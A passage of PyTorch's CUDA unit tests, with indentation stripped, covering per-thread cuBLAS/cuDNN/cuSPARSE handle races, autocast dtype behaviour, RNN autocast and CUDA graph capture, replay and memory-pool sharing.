with torch.cuda.stream(my_stream):
for i in range(test_iters):
# If all threads are sharing the same cublas handle,
# the following sequence may occur:
# thread 0 calls cublasSetStream()
# thread 1 calls cublasSetStream()
# thread 0 launches its raw gemm, which it thinks is in
# its own stream, but is actually in thread 1's stream.
# thread 0 enqueues its div_, which IS is its own stream,
# but actually now races with its gemm.
results[t] = torch.mm(results[t], weight)
results[t].div_(float(size))
torch.cuda.synchronize()
for _ in range(trials):
for t in range(num_threads):
results[t] = torch.ones((size, size), device='cuda')
threads = [threading.Thread(target=_worker,
args=(t,)) for t in range(num_threads)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
for t in range(num_threads):
self.assertEqual(results[t].sum().item(), size * size)
# Test is flaky on Windows (https://github.com/pytorch/pytorch/issues/57401)
@unittest.skipIf(IS_WINDOWS, 'Test is flaky on Windows (see issue 57401)')
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
@skipIfRocm
def test_cudnn_multiple_threads_same_device(self):
# This function is intended to test the lazy creation and reuse of per-thread
# cudnn handles on each device in aten/src/ATen/cudnn/Handles.cpp.
# Failure here likely indicates something wrong with that logic.
weight = torch.ones((1, 1, 2, 2), device='cuda')
results = {}
num_threads = 2
trials = 3
test_iters = 1000
barrier = threading.Barrier(num_threads)
with torch.backends.cudnn.flags(enabled=True):
def _worker(t):
my_stream = torch.cuda.Stream()
# Hard sync so we don't need to worry about creating and using tensors
# across streams or the fact that default streams are thread-local.
# Those issues are not the target of this test.
torch.cuda.synchronize()
# Line up threads to increase likelihood of race conditions.
barrier.wait()
with torch.cuda.stream(my_stream):
for _ in range(test_iters):
# If all threads are sharing the same cudnn handle,
# the following sequence may occur:
# thread 0 calls setCuDNNStreamToCurrent()
# thread 1 calls setCuDNNStreamToCurrent()
# thread 0 launches its raw convolution, which it thinks is in
# its own stream, but is actually in thread 1's stream.
# thread 0 enqueues its div_, which IS is its own stream,
# but now races with its convolution.
results[t] = torch.nn.functional.conv2d(results[t], weight, padding=0)
results[t].div_(4.0)
torch.cuda.synchronize()
for _ in range(trials):
for t in range(num_threads):
results[t] = torch.ones((1, 1, 2048, 2048), device='cuda')
threads = [threading.Thread(target=_worker,
args=(t,)) for t in range(num_threads)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
for t in range(num_threads):
self.assertEqual(results[t].sum().item(),
(2048 - test_iters) * (2048 - test_iters))
def test_cusparse_multiple_threads_same_device(self):
size = 1024
num_threads = 2
trials = 3
test_iters = 500
def ones_sparse(size):
a = torch.arange(size, device='cuda')
indices = torch.cartesian_prod(a, a).t()
values = torch.ones(size * size, device='cuda')
return torch.sparse_coo_tensor(indices, values)
weight = ones_sparse(size)
results = {}
barrier = threading.Barrier(num_threads)
def _worker(t):
my_stream = torch.cuda.Stream()
# Hard sync so we don't need to worry about creating and using tensors
# across streams or the fact that default streams are thread-local.
# Those issues are not the target of this test.
torch.cuda.synchronize()
# Line up threads to increase likelihood of race conditions.
barrier.wait()
with torch.cuda.stream(my_stream):
for i in range(test_iters):
# If all threads are sharing the same cublas handle,
# the following sequence may occur:
# thread 0 calls cublasSetStream()
# thread 1 calls cublasSetStream()
# thread 0 launches its raw gemm, which it thinks is in
# its own stream, but is actually in thread 1's stream.
# thread 0 enqueues its div_, which IS is its own stream,
# but actually now races with its gemm.
results[t] = weight.mm(results[t])
results[t].div_(float(size))
torch.cuda.synchronize()
for _ in range(trials):
for t in range(num_threads):
results[t] = torch.ones((size, size), device='cuda')
threads = [threading.Thread(target=_worker,
args=(t,)) for t in range(num_threads)]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
for t in range(num_threads):
self.assertEqual(results[t].sum().item(), size * size)
def _run_autocast_outofplace(self, op, args, run_as_type, out_type=None, module=torch, add_kwargs=None):
# helper to cast args
def cast(val, to_type):
if isinstance(val, torch.Tensor):
return val.to(to_type) if val.is_floating_point() else val
elif isinstance(val, collections.abc.Iterable):
return type(val)(cast(v, to_type) for v in val)
else:
return val
if add_kwargs is None:
add_kwargs = {}
fast_dtype = torch.bfloat16 if run_as_type == torch.bfloat16 else torch.float16
self.assertFalse(torch.is_autocast_enabled())
with torch.autocast('cuda', dtype=fast_dtype):
self.assertTrue(torch.is_autocast_enabled())
out_type = out_type if out_type is not None else run_as_type
output = output_method = None
# Try module.* variant, if requested:
if module is not None and hasattr(module, op):
output = getattr(module, op)(*args, **add_kwargs)
if isinstance(output, torch.Tensor):
self.assertTrue(out_type == output.dtype,
"autocast for torch.{} produced {}, should produce {}"
.format(op, output.dtype, out_type))
# Try Tensor.* variant:
if hasattr(torch.Tensor, op):
output_method = getattr(args[0], op)(*args[1:], **add_kwargs)
if isinstance(output_method, torch.Tensor):
self.assertTrue(out_type == output_method.dtype,
"autocast for torch.{} produced {}, should produce torch.{}"
.format(op, output_method.dtype, out_type))
self.assertTrue((output is not None) or (output_method is not None),
"{} not found as an attribute on either Tensor or the requested module {}".format(
op, module))
# Accounts for ops that return Tensors, iterables, and other non-Tensors.
# For example, lstm_cell returns a tuple and equal returns bool.
def compare(first, second):
if isinstance(first, torch.Tensor):
return torch.equal(first, second)
elif isinstance(first, collections.abc.Iterable):
return all(compare(f, s) for f, s in zip(first, second))
else:
return first == second
# If both torch.* and Tensor.* variants were found, check outputs are identical
if (output is not None) and (output_method is not None):
self.assertTrue(type(output) == type(output_method))
comparison = compare(output, output_method)
self.assertTrue(comparison, "torch.{0} result did not match Tensor.{0} result".format(op))
# Compare numerics to Python-side "autocasting" that (we expect) does the same thing
# as the C++-side autocasting, and should be bitwise accurate.
output_to_compare = output if output is not None else output_method
with torch.autocast('cuda', enabled=False):
self.assertFalse(torch.is_autocast_enabled())
if module is not None and hasattr(module, op):
control = getattr(module, op)(*cast(args, run_as_type), **add_kwargs)
else:
control = getattr(args[0].to(run_as_type), op)(*cast(args[1:], run_as_type), **add_kwargs)
self.assertTrue(type(output_to_compare) == type(control))
comparison = compare(output_to_compare, control)
self.assertTrue(comparison, "torch.{} result did not match control".format(op))
self.assertTrue(torch.is_autocast_enabled())
self.assertFalse(torch.is_autocast_enabled())
def args_maybe_kwargs(self, op_with_args):
if len(op_with_args) == 2:
return op_with_args[0], op_with_args[1], {}
else:
return op_with_args[0], op_with_args[1], op_with_args[2]
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_torch_fp16(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
for op_with_args in self.autocast_lists.torch_fp16:
skip_test = False
op, args = op_with_args[0], op_with_args[1]
if len(op_with_args) == 3:
skip_test = op_with_args[2] # TEST_WITH_ROCM
if not skip_test:
self._run_autocast_outofplace(op, args, torch.float16)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_torch_bf16(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
for op_with_args in self.autocast_lists.torch_fp16:
skip_test = False
op, args = op_with_args[0], op_with_args[1]
if len(op_with_args) == 3:
skip_test = op_with_args[2] # TEST_WITH_ROCM
should_error_from_not_implemented = 'cudnn' in op or 'prelu' in op or 'thnn' in op \
or 'fused' in op or 'gru' in op or op == '_thnn_fused_lstm_cell' or op == 'lstm_cell'
if not skip_test:
if should_error_from_not_implemented:
with self.assertRaises(RuntimeError, msg=str(op) + ' should not be supported for bfloat16!'):
self._run_autocast_outofplace(op, args, torch.bfloat16)
else:
if torch.cuda.is_bf16_supported():
self._run_autocast_outofplace(op, args, torch.bfloat16)
else:
with self.assertRaisesRegex(RuntimeError, 'Device does not support bfloat16'):
self._run_autocast_outofplace(op, args, torch.bfloat16)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_torch_fp32(self):
for op_with_args in self.autocast_lists.torch_fp32:
op, args, maybe_kwargs = self.args_maybe_kwargs(op_with_args)
self._run_autocast_outofplace(op, args, torch.float32, add_kwargs=maybe_kwargs)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_torch_need_autocast_promote(self):
for op, args in self.autocast_lists.torch_need_autocast_promote:
self._run_autocast_outofplace(op, args, torch.float32)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_torch_expect_builtin_promote(self):
for op, args, out_type in self.autocast_lists.torch_expect_builtin_promote:
self._run_autocast_outofplace(op, args, torch.float32, out_type=out_type)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_nn_fp16(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
for op, args in self.autocast_lists.nn_fp16:
self._run_autocast_outofplace(op, args, torch.float16, module=torch._C._nn)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_nn_bf16(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
for op, args in self.autocast_lists.nn_fp16:
if torch.cuda.is_bf16_supported():
self._run_autocast_outofplace(op, args, torch.bfloat16, module=torch._C._nn)
else:
with self.assertRaisesRegex(RuntimeError, 'Device does not support bfloat16'):
self._run_autocast_outofplace(op, args, torch.bfloat16, module=torch._C._nn)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_nn_fp32(self):
for op, args in self.autocast_lists.nn_fp32:
self._run_autocast_outofplace(op, args, torch.float32, module=torch._C._nn)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_linalg_fp16(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
for op, args in self.autocast_lists.linalg_fp16:
self._run_autocast_outofplace(op, args, torch.float16, module=torch._C._linalg)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_methods_fp16(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
for op, args in self.autocast_lists.methods_fp16:
self._run_autocast_outofplace(op, args, torch.float16, module=None)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_methods_fp32(self):
for op, args in self.autocast_lists.methods_fp32:
self._run_autocast_outofplace(op, args, torch.float32, module=None)
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_methods_expect_builtin_promote(self):
for op, args, out_type in self.autocast_lists.methods_expect_builtin_promote:
self._run_autocast_outofplace(op, args, torch.float32, module=None, out_type=out_type)
def test_autocast_banned(self):
with torch.autocast('cuda'):
for op, args, module in self.autocast_lists.banned:
with self.assertRaises(RuntimeError):
getattr(module, op)(*args)
def test_autocast_ignored_types(self):
with torch.autocast('cuda'):
for ignore_type in (torch.double, torch.int32):
a_ignore = torch.ones((8, 8), dtype=ignore_type, device="cuda:0")
b_ignore = torch.ones((8, 8), dtype=ignore_type, device="cuda:0")
c_16 = torch.ones((8, 8), dtype=torch.float16, device="cuda:0")
# Tests if CastPolicy::fp16 ops ignore double and int
# Currently, no ops belonging to this policy support integer inputs.
if ignore_type is torch.double:
with self.assertRaises(RuntimeError):
torch.mm(a_ignore, c_16)
with torch.autocast('cuda', enabled=False):
type_no_autocast = torch.mm(a_ignore, b_ignore).dtype
self.assertTrue(torch.mm(a_ignore, b_ignore).dtype is type_no_autocast)
# Tests if CastPolicy::fp32 ops ignore double and int
with torch.autocast('cuda', enabled=False):
type_no_autocast = torch.pow(a_ignore, 2.0).dtype
self.assertTrue(torch.pow(a_ignore, 2.0).dtype is type_no_autocast)
# Tests if CastPolicy::fp32_set_opt_dtype ops ignore double and int
with torch.autocast('cuda', enabled=False):
type_no_autocast = torch.sum(a_ignore).dtype
self.assertTrue(torch.sum(a_ignore).dtype is type_no_autocast)
# Tests if CastPolicy::fp32_append_dtype ops ignore double and int
# Currently, no ops belonging to this policy support integer inputs.
if ignore_type is torch.double:
with torch.autocast('cuda', enabled=False):
type_no_autocast = torch.norm(a_ignore).dtype
self.assertTrue(torch.norm(a_ignore).dtype is type_no_autocast)
def test_autocast_custom_enabled(self):
class MyMM(torch.autograd.Function):
@staticmethod
@torch.cuda.amp.custom_fwd
def forward(ctx, a, b):
self.assertTrue(a.dtype is torch.float32)
self.assertTrue(b.dtype is torch.float32)
self.assertTrue(torch.is_autocast_enabled())
ctx.save_for_backward(a, b)
return a.mm(b)
@staticmethod
@torch.cuda.amp.custom_bwd
def backward(ctx, grad):
self.assertTrue(torch.is_autocast_enabled())
a, b = ctx.saved_tensors
return grad.mm(b.t()), a.t().mm(grad)
mymm = MyMM.apply
x = torch.randn((8, 8), device="cuda", dtype=torch.float32, requires_grad=True)
y = torch.randn((8, 8), device="cuda", dtype=torch.float32, requires_grad=True)
with torch.cuda.amp.autocast():
output = mymm(x, y)
self.assertTrue(output.dtype is torch.float16)
loss = output.sum()
loss.backward()
def test_autocast_custom_cast_inputs(self):
class MyMM(torch.autograd.Function):
@staticmethod
@torch.cuda.amp.custom_fwd(cast_inputs=torch.float32)
def forward(ctx, a, container, expect_type):
b = container[1][0]
self.assertTrue(a.dtype is expect_type)
self.assertTrue(b.dtype is expect_type)
self.assertFalse(torch.is_autocast_enabled())
ctx.save_for_backward(a, b)
return a.mm(b)
@staticmethod
@torch.cuda.amp.custom_bwd
def backward(ctx, grad):
self.assertFalse(torch.is_autocast_enabled())
a, b = ctx.saved_tensors
return grad.mm(b.t()), None, None
mymm = MyMM.apply
x = torch.randn((8, 8), device="cuda", dtype=torch.float16, requires_grad=True)
# Puts one input tensor in a nested container. y's contained Tensor won't receive a gradient,
# because torch.autograd.Function can't hand gradients back to non-Tensor forward arguments.
# Sets requires_grad=False explicitly so we don't lie about expecting a gradient.
y = (0, {0: torch.randn((8, 8), device="cuda", dtype=torch.float16, requires_grad=False)})
with torch.autocast('cuda', ):
output = mymm(x, y, torch.float32)
self.assertTrue(output.dtype is torch.float32)
loss = output.sum()
loss.backward()
# Tests if custom_fwd becomes a no-op when mymm runs outside an autocast-enabled region.
output = mymm(x, y, torch.float16)
self.assertTrue(output.dtype is torch.float16)
loss = output.sum()
loss.backward()
def test_autocast_cat_jit(self):
# Reported at https://github.com/pytorch/pytorch/issues/38958
class Model(torch.nn.Module):
def forward(self):
a = torch.randn(1)
b = torch.randn(1)
c = torch.cat((a, b), 0)
d = torch.stack([c, c], 0)
return d
# The JIT here doesn't really matter, we just need to call
# cat via the boxed API
model = Model()
model_jit_script = torch.jit.script(model)
with torch.autocast('cuda', enabled=True):
model()
model_jit_script()
# cudnn RNNs require special backend handling (weights are cast to FP16 and reflattened)
# so they get a dedicated test.
# Despite the large number of RNN cases it tries, the test takes < 15 seconds on a Titan V (similar to V100).
@skipIfRocm
@unittest.skipIf(not TEST_CUDNN, 'CUDNN not available')
def test_autocast_rnn(self):
with torch.backends.cudnn.flags(enabled=True, deterministic=True):
# seq, batch, features, hidden size
clses = ("RNN", "GRU", "LSTM")
T, B, F, H = 3, 4, 5, 6
dtypes = (torch.float16, torch.float32)
input_layouts = ("seq_first", "batch_first", "packed")
for (cls, num_layers, bias, input_layout, bidirectional, try_nonpreflattened_weights,
input_dtype, hidden_dtype, weight_dtype) in \
product(clses, (1, 2), (True, False), input_layouts, (True, False), (True, False),
dtypes, dtypes, dtypes):
if input_layout == "seq_first":
batch_first = False
x = torch.randn((T, B, F), device="cuda", dtype=input_dtype)
elif input_layout == "batch_first":
batch_first = True
x = torch.randn((B, T, F), device="cuda", dtype=input_dtype)
elif input_layout == "packed":
batch_first = False
x = torch.randn((T, B, F), device="cuda", dtype=input_dtype)
x = torch.nn.utils.rnn.pack_padded_sequence(torch.randn((T, B, F),
device="cuda", dtype=input_dtype),
lengths=(3, 2, 1, 3),
enforce_sorted=False)
rnn = getattr(torch.nn, cls)(F, H, num_layers=num_layers, bidirectional=bidirectional,
bias=bias, batch_first=batch_first).cuda().to(dtype=weight_dtype)
if try_nonpreflattened_weights:
for p in rnn.parameters():
with torch.no_grad():
p.set_(p.clone())
h = torch.randn((num_layers * (2 if bidirectional else 1), B, H),
device="cuda", dtype=hidden_dtype)
if cls == "LSTM":
c = torch.randn((num_layers * (2 if bidirectional else 1), B, H),
device="cuda", dtype=hidden_dtype)
h = (h, c)
with torch.autocast('cuda', ):
out, h_out = rnn(x, h)
out = out.data if input_layout == "packed" else out
self.assertEqual(out.dtype, torch.float16)
# Autocast wrapper requires at::_cudnn_rnn is autograd-exposed. This check can't guarantee
# at::_cudnn_rnn is autograd-exposed, but if it fires, it indicates some funny business has
# occurred and we should double check that at::_cudnn_rnn remains autograd-exposed.
self.assertEqual(out.grad_fn.name(), "CudnnRnnBackward0")
out.sum().backward()
grads = [p.grad.clone() for p in rnn.parameters()]
rnn.zero_grad()
if cls == "LSTM":
out_control, h_out_control = rnn.to(dtype=torch.float16)(x.half(), (h[0].half(), h[1].half()))
else:
out_control, h_out_control = rnn.to(dtype=torch.float16)(x.half(), h.half())
out_control = out_control.data if input_layout == "packed" else out_control
out_control.sum().backward()
grads_control = [p.grad.clone() for p in rnn.parameters()]
# Compares with default tolerances, even for FP16 execution. Barring nondeterminism,
# autocast and control results should be bitwise identical.
self.assertEqual(out, out_control)
if cls == "LSTM":
self.assertTrue(h_out[0].dtype is torch.float16 and h_out[1].dtype is torch.float16)
self.assertEqual(h_out[0], h_out_control[0])
self.assertEqual(h_out[1], h_out_control[1])
else:
self.assertEqual(h_out.dtype, torch.float16)
self.assertEqual(h_out, h_out_control)
for grad, grad_control in zip(grads, grads_control):
self.assertEqual(grad.half(), grad_control)
def test_autocast_cache_leak(self):
# Reported at https://github.com/pytorch/pytorch/issues/48049
# Test is used to check, if autocast recaches the same parameters
# when executed in a `torch.no_grad()` block.
linear = torch.nn.Linear(10, 10).to('cuda')
data = torch.randn(1, 10, device='cuda')
with torch.autocast('cuda', ):
with torch.no_grad():
out = linear(data)
first_iter_mem = torch.cuda.memory_allocated()
for _ in range(3):
out = linear(data)
self.assertTrue(first_iter_mem == torch.cuda.memory_allocated())
def test_autocast_checkpointing(self):
model = torch.nn.Sequential(torch.nn.Linear(8, 8),
torch.nn.Linear(8, 8),
torch.nn.Linear(8, 8)).cuda()
input = torch.rand((8, 8), device="cuda", dtype=torch.float16, requires_grad=True)
with torch.autocast('cuda', ):
output = checkpoint_sequential(model, 2, input)
self.assertTrue(output.requires_grad)
self.assertTrue(output.dtype is torch.float16)
output.sum().backward()
@slowTest
@unittest.skipIf(not TEST_LARGE_TENSOR, "not enough memory")
def test_max_large_axis(self):
x = torch.zeros(2**32, device='cuda', dtype=torch.int8)
x[-1] = 1
val, idx = x.max(0)
self.assertEqual(val, 1)
self.assertEqual(idx, x.shape[0] - 1)
@unittest.skipIf(not TEST_NUMPY, "Numpy not found")
def test_to_numpy(self):
self.assertRaises(TypeError, lambda: torch.empty(1, device="cuda").numpy())
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_capture_simple(self):
s = torch.cuda.Stream()
with torch.cuda.stream(s):
a = torch.full((1000,), 1, device="cuda")
g = torch.cuda.CUDAGraph()
torch.cuda.empty_cache()
g.capture_begin()
b = a
for _ in range(10):
b = b + 1
g.capture_end()
torch.cuda.current_stream().wait_stream(s)
g.replay()
self.assertTrue(b.sum().item() == 11000.)
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_rng_functional(self):
ops_with_kwargs = ((torch.nn.functional.dropout, {"p": 0.1}),
(torch.nn.functional.rrelu, {"training": True}),)
size = 10000
def run(op, kwargs):
a = torch.randn((size,), device="cuda", dtype=torch.float)
# Control
torch.cuda.manual_seed(5)
eager_out = a
for _ in range(6):
eager_out = op(eager_out, **kwargs)
graph_in = a.clone()
stream = torch.cuda.Stream()
stream.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(stream):
torch.cuda.manual_seed(5)
g = torch.cuda.CUDAGraph()
torch.cuda.empty_cache()
g.capture_begin()
graph_out = graph_in
for _ in range(2):
graph_out = op(graph_out, **kwargs)
g.capture_end()
torch.cuda.current_stream().wait_stream(stream)
# Runs a graphed->eager->graphed sequence of RNG ops.
# replay() plays 2 invocations of the op, so the sequence has 6
# invocations total, matching Control.
# replay() reads from graph_in and writes to graph_out.
g.replay()
out = op(graph_out, **kwargs)
out = op(out, **kwargs)
graph_in.copy_(out)
g.replay()
# If replay() updated RNG state correctly, graph_out
# should now hold data equal to eager_out.
try:
self.assertEqual(eager_out, graph_out)
except Exception as e:
raise RuntimeError("Failed on ", op) from e
# We hold references to all tensors used across streams up til this sync,
# so no need to call record_stream on those tensors.
torch.cuda.synchronize()
for op, kwargs in ops_with_kwargs:
run(op, kwargs)
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_rng_distributions(self):
size = 10000
input = torch.rand((size,), device="cuda", dtype=torch.float)
alloc = torch.empty((size,), device="cuda", dtype=torch.float)
# Torch ops to test with sample args (tuple) and kwargs (dict)
torch_with_args = (("bernoulli", (input.clone(),), {}),
# multinomial uses some uncapturable CUDA calls.
# TODO: reenable multinomial tests if/when the implementation is capturable.
# ("multinomial", (input.clone(), size, True), {}),
# ("multinomial", (input.clone(), size // 2, False), {}),
# TODO: reenable normal test, where std is a device
# tensor, when graph test failures are fixed
# ("normal", (input.clone() + 1, input.clone()), {}),
("normal", (input.clone() + 1, 1.0), {}),
("poisson", (input.clone(),), {}),
("rand", (size,), {"device": "cuda", "dtype": torch.float}),
("randint", (0, 3, (size,)), {"device": "cuda", "dtype": torch.float}),
("randn", (size,), {"device": "cuda", "dtype": torch.float}),)
# Tensor methods to test with sample args (tuple)
tensor_with_args = (("bernoulli_", (input.clone(),)),
("cauchy_", ()),
("exponential_", ()),
("geometric_", (0.3,)),
("log_normal_", ()),
("normal_", ()),
("random_", ()),
("uniform_", ()),)
def run(module, op, args, kwargs):
torch.cuda.manual_seed(5)
# Each path runs a dummy op to increment the state a bit before creating controls.
if (module == "torch"):
dummy = getattr(torch, op)(*args, **kwargs)
control1 = getattr(torch, op)(*args, **kwargs)
control2 = getattr(torch, op)(*args, **kwargs)
else:
dummy = alloc.clone()
control1 = alloc.clone()
control2 = alloc.clone()
getattr(dummy, op)(*args)
getattr(control1, op)(*args)
getattr(control2, op)(*args)
stream = torch.cuda.Stream()
stream.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(stream):
torch.cuda.manual_seed(5)
g = torch.cuda.CUDAGraph()
torch.cuda.empty_cache()
if (module == "torch"):
g.capture_begin()
t1 = getattr(torch, op)(*args, **kwargs)
t2 = getattr(torch, op)(*args, **kwargs)
g.capture_end()
else:
t1 = alloc.clone()
t2 = alloc.clone()
g.capture_begin()
getattr(t1, op)(*args)
getattr(t2, op)(*args)
g.capture_end()
torch.cuda.current_stream().wait_stream(stream)
try:
self.assertNotEqual(control1, t1)
self.assertNotEqual(control2, t2)
except Exception as e:
raise RuntimeError("Failed on " + module + "." + op) from e
# Runs a dummy op prelude, as for controls, to make sure replay()
# picks up the dummy op's state increment.
if module == "torch":
dummy = getattr(torch, op)(*args, **kwargs)
else:
dummy = alloc.clone()
getattr(dummy, op)(*args)
# Runs RNG ops that fill t1 and t2.
g.replay()
try:
self.assertEqual(control1, t1)
self.assertEqual(control2, t2)
except Exception as e:
raise RuntimeError("Failed on " + module + "." + op) from e
# We hold references to all tensors used across streams up til this sync,
# so no need to call record_stream on those tensors.
torch.cuda.synchronize()
for op_with_args in torch_with_args:
run("torch", *op_with_args)
for meth_with_args in tensor_with_args:
# Adds an empty dict for kwargs, which none of the Tensor methods use
run("Tensor", *(meth_with_args + ({},)))
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_two_successive(self):
torch.cuda.empty_cache()
size = 1000
kSmallBuffer = 2097152
def func_with_temps(t, val):
x = t.clone() + val
y = t.clone() + val
return x + y
s = torch.cuda.Stream()
for share_mem in ("Don't share", "via pool()", "via graph_pool_handle()"):
g0 = torch.cuda.CUDAGraph()
g1 = torch.cuda.CUDAGraph()
a = torch.ones((size,), device="cuda")
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
g0_args = (torch.cuda.graph_pool_handle(),) if share_mem == "via graph_pool_handle()" else ()
g0.capture_begin(*g0_args)
b = a.clone()
for _ in range(5):
b = func_with_temps(b, 1)
g0.capture_end()
g1_args = (g0.pool(),) if share_mem == "via pool()" else g0_args
g1.capture_begin(*g1_args)
for _ in range(5):
b = func_with_temps(b, 1)
g1.capture_end()
torch.cuda.current_stream().wait_stream(s)
# mixes unrelated eager ops with replays
c = a.clone()
for _ in range(2):
c = func_with_temps(c, 3)
g0.replay()
for _ in range(2):
c = func_with_temps(c, 3)
g1.replay()
for _ in range(2):
c = func_with_temps(c, 3)
self.assertEqual(b.sum().item(), size * 3070)
self.assertEqual(c.sum().item(), size * 442)
if share_mem != "Don't share":
self.assertEqual(reserved_no_sharing - torch.cuda.memory_stats()["reserved_bytes.all.current"],
kSmallBuffer)
else:
reserved_no_sharing = torch.cuda.memory_stats()["reserved_bytes.all.current"]
del a, b, c, g0, g1
# Tensors used across streams (a and b) were held until just now, so no need to call record_stream on them.
torch.cuda.synchronize()
torch.cuda.empty_cache()
@unittest.skip("Temporarily disabled due to a graphs bug in libcuda.so, " +
"see https://github.com/pytorch/pytorch/pull/57556")
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_concurrent_replay(self):
torch.cuda.empty_cache()
size = 1000000 # largeish to help expose race conditions
def func_with_temps(t, val):
x = t.clone() + val
y = t.clone() + val
return x + y
s = torch.cuda.Stream()
for share_mem in ("Don't share", "via pool()", "via graph_pool_handle()"):
g0 = torch.cuda.CUDAGraph()
g1 = torch.cuda.CUDAGraph()
s0 = torch.cuda.Stream()
s1 = torch.cuda.Stream()
a = torch.ones((size,), device="cuda")
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
g0_args = (torch.cuda.graph_pool_handle(),) if share_mem == "via graph_pool_handle()" else ()
g0.capture_begin(*g0_args)
b = a.clone()
for _ in range(5):
b = func_with_temps(b, 1)
g0.capture_end()
g1_args = (g0.pool(),) if share_mem == "via pool()" else g0_args
g1.capture_begin(*g1_args)
c = a.clone()
for _ in range(5):
c = func_with_temps(c, 2)
g1.capture_end()
# To reproduce data corruption, I need g0 and g1's kernels to run concurrently.
# But replay() (especially cudaGraphLaunch) can incur significant CPU overhead.
# The following pattern helps align device-side execution of g0 and g1's kernels.
torch.cuda.synchronize()
with torch.cuda.stream(s0):
torch.cuda._sleep(1000000)
s1.wait_stream(s0)
g0.replay()
with torch.cuda.stream(s1):
g1.replay()
torch.cuda.current_stream().wait_stream(s0)
torch.cuda.current_stream().wait_stream(s1)
if share_mem != "Don't share":
# Confirms concurrent replays using the same mempool corrupted each other.
self.assertNotEqual(b.sum().item(), size * 94)
self.assertNotEqual(c.sum().item(), size * 156)
else:
# Confirms concurrent replays using different mempools did not corrupt each other.
self.assertEqual(b.sum().item(), size * 94)
self.assertEqual(c.sum().item(), size * 156)
del a, b, c, g0, g1
# Tensors used across streams (a, b, c) were held until just now, so no need to call record_stream on them.
torch.cuda.synchronize()
torch.cuda.empty_cache()
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_three_successive(self):
torch.cuda.empty_cache()
size = 1000
s = torch.cuda.Stream()
for share_mem in ("Don't share", "via pool()", "via graph_pool_handle()"):
a = torch.ones((size,), device="cuda")
g0 = torch.cuda.CUDAGraph()
g1 = torch.cuda.CUDAGraph()
g2 = torch.cuda.CUDAGraph()
s.wait_stream(torch.cuda.current_stream())
with torch.cuda.stream(s):
g0_args = (torch.cuda.graph_pool_handle(),) if share_mem == "via graph_pool_handle()" else ()
g0.capture_begin(*g0_args)
b = a.clone()
c = b + 1
d = b + 2
g0.capture_end()
args = (g0.pool(),) if share_mem == "via pool()" else g0_args
g1.capture_begin(*args)
e = c + 3
del c
g1.capture_end()
g2.capture_begin(*args)
f = d + 4
g2.capture_end()
torch.cuda.current_stream().wait_stream(s)
# Tests that replaying in capture order is valid
g0.replay()
g1.replay()
g2.replay()
self.assertEqual(e.sum().item(), size * 5)
self.assertEqual(f.sum().item(), size * 7)
# Tests that replaying as g0, g2, g1 is only valid if they don't share a pool
g0.replay()
g2.replay()
g1.replay()
# If share_mem is True, g2's capture should have reused c's memory for f. We replayed g2 then g1,
# so we expect g1's captured "e = c + 3" mistakenly filled e with "f's vals + 3".
self.assertEqual(e.sum().item(), size * (7 + 3) if share_mem != "Don't share" else size * 5)
self.assertEqual(f.sum().item(), size * 7)
del a, b, d, e, f, g0, g1, g2
# Tensors used across streams (a, e, f) were held until just now, so no need to call record_stream on them.
torch.cuda.synchronize()
torch.cuda.empty_cache()
@unittest.skipIf((not TEST_CUDA) or
TEST_WITH_ROCM or
int(torch.version.cuda.split(".")[0]) < 11, "CUDA >= 11.0 required for graphs")
def test_graph_memory_stats_and_use_result_after_destroy_graph(self):
kSmallSize = 1048576
kSmallBuffer = 2097152
kLargeBuffer = 20971520
kMinLargeAlloc = 10485760
kRoundLarge = 2097152
elem = 4
# this was annoying to write but stresses the expectations pretty rigorously
cases = ((512 // elem, 1, kSmallBuffer, kSmallBuffer, "small_pool"),
(kSmallSize // elem, 2, 2 * kSmallBuffer, kSmallBuffer, "small_pool"),
((kSmallSize + 512) // elem, 1, kLargeBuffer, kLargeBuffer, "large_pool"),
((kMinLargeAlloc - 512) // elem, 2, 2 * kLargeBuffer, kLargeBuffer, "large_pool"),
